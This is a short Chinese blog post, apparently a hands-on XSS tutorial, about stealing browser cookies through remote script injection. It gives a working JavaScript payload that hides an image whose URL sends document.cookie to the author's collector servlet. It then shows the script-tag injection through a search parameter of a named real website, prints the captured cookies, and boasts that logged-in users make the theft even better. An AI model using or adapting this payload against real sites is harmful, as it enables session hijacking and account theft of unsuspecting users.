XSS Payload 远程脚本攻击

今天看了一本书,关于web安全方面的,所以也动手测试了以下。

下面就只讲一下 XSS Payload远程脚本攻击吧, 执行远程脚本,提取cookie


先来个简单的吧

<script>alert(1);</script>


首先说明像chrome、ie新版等浏览器已经有css防御

比如以下是chrome浏览器打印出来的,chrome浏览器的安全机制是比较强大的


后来试用了火狐浏览器,没想到确实可以。



那么下边我们来做个提取cookies信息的js,另外写一个servlet进行打印“存储”


js文件如下


var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://127.0.0.1:8080/Test/hello?cookie='+encodeURIComponent(document.cookie);

servlet就不写了,简单的get请求,获取参数进行打印


然后启动这个服务。

把 这段代码注入到页面中

<script src="http://127.0.0.1:8080/Test/static/p.js"></script>


例如访问路径为:
http://codecloud.net/?s=<script src='http://127.0.0.1:8080/Test/static/p.js'></script>

OK,后台打印cookie信息成功。

Hm_lvt_f9c50534f93ca6e9404bc6bcb294115c=1460455423; Hm_lpvt_f9c50534f93ca6e9404bc6bcb294115c=1460458080; BDTUJIAID=0f260b8f0f6bd80e5a66403f2918b693; _ga=GA1.2.1298042985.1460455423; _gat=1

毫无压力所有cookie到手,如果当时用户登录中效果更佳 :)


版权属于: 技术客
官方地址: http://www.sunjs.com 
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值